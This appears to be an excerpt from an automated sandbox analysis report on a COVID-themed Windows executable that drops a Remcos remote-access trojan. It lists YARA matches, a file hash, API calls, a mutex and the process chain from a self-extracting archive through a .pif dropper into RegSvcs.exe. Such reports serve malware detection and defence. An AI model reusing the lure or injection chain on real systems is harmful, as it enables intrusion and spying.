                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4FCDE0_2_00C4FCDE
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C46CDB0_2_00C46CDB
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C53CBA0_2_00C53CBA
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C35D7E0_2_00C35D7E
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C53EE90_2_00C53EE9
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C33EAD0_2_00C33EAD
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C3DF120_2_00C3DF12
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_012F98F04_2_012F98F0
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_012F35F04_2_012F35F0
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_0130A1374_2_0130A137
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_013019034_2_01301903
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_0131088F4_2_0131088F
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_013037214_2_01303721
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_01311F2C4_2_01311F2C
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_012FF7304_2_012FF730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013BD2A66_2_013BD2A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B0D2A612_2_00B0D2A6
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeSection loaded: dxgidebug.dllJump to behavior
                Source: Joe Sandbox ViewDropped File: C:\84086963\xdhqeufpq.pif 699534A988A6AA7C8C5FF4EB01AC28292BE257B0312E6D7351FB4CACAA4124D5
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: 4.3.xdhqeufpq.pif.4a112a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 4.3.xdhqeufpq.pif.4a112a0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.3.xdhqeufpq.pif.4d70a88.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 8.3.xdhqeufpq.pif.4d70a88.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 12.2.RegSvcs.exe.b00000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 12.2.RegSvcs.exe.b00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.3.xdhqeufpq.pif.49d0a88.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 4.3.xdhqeufpq.pif.49d0a88.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.3.xdhqeufpq.pif.4990a78.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 4.3.xdhqeufpq.pif.4990a78.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.RegSvcs.exe.13b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 6.2.RegSvcs.exe.13b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.3.xdhqeufpq.pif.49d0a88.4.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 4.3.xdhqeufpq.pif.49d0a88.4.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 12.2.RegSvcs.exe.b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 12.2.RegSvcs.exe.b00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 6.2.RegSvcs.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 6.2.RegSvcs.exe.13b0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 4.3.xdhqeufpq.pif.49d0a88.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 4.3.xdhqeufpq.pif.49d0a88.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.3.xdhqeufpq.pif.4d30a78.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 8.3.xdhqeufpq.pif.4d30a78.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.3.xdhqeufpq.pif.4d70a88.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 8.3.xdhqeufpq.pif.4d70a88.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.3.xdhqeufpq.pif.4db0a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 8.3.xdhqeufpq.pif.4db0a98.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 8.3.xdhqeufpq.pif.4d70a88.2.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 8.3.xdhqeufpq.pif.4d70a88.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
                Source: 0000000C.00000002.422028916.0000000000B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013BD2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait6_2_013BD2A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B0D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_00B0D2A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00B1203B appears 31 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 013C3E72 appears 49 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00B13E72 appears 49 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 013C203B appears 31 times
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: String function: 00C4D940 appears 51 times
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: String function: 00C4E2F0 appears 31 times
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: String function: 00C4D870 appears 35 times
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C36FC6: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00C36FC6
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\remcosJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/80@1/2
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeFile read: C:\Windows\win.iniJump to behavior
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C36D06 GetLastError,FormatMessageW,0_2_00C36D06
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013C1927 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,6_2_013C1927
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCode function: 0_2_00C4963A FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00C4963A
                Source: Covid-19 Data Report Google Checklist.exeVirustotal: Detection: 48%
                Source: Covid-19 Data Report Google Checklist.exeReversingLabs: Detection: 57%
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeFile read: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeJump to behavior
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe 'C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exe'
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeProcess created: C:\84086963\xdhqeufpq.pif 'C:\84086963\xdhqeufpq.pif' fqficjon.emu
                Source: C:\84086963\xdhqeufpq.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                Source: unknownProcess created: C:\84086963\xdhqeufpq.pif 'C:\84086963\XDHQEU~1.PIF' c:\84086963\fqficjon.emu
                Source: C:\84086963\xdhqeufpq.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeProcess created: C:\84086963\xdhqeufpq.pif 'C:\84086963\xdhqeufpq.pif' fqficjon.emuJump to behavior
                Source: C:\84086963\xdhqeufpq.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                Source: C:\84086963\xdhqeufpq.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_013BEC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6_2_013BEC0F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_00B0EC0F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00B0EC0F
                Source: C:\84086963\xdhqeufpq.pifFile created: C:\Users\user\temp\keiv.bmpJump to behavior
                Source: C:\84086963\xdhqeufpq.pifCode function: 4_2_01323EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,FindCloseChangeNotification,4_2_01323EC5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-VHEUO4
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCommand line argument: sfxname0_2_00C4CBB8
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCommand line argument: sfxstime0_2_00C4CBB8
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeCommand line argument: STARTDLG0_2_00C4CBB8
                Source: C:\Users\user\Desktop\Covid-19 Data Report Google Checklist.exeFile written: C:\84086963\ipontssug.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Covid-19 Data Report Google Checklist.exeStatic file information: File size 1218155 > 1048576
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Covid-19 Data Report Google Checklist.exe
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Covid-19 Data Report Google Checklist.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
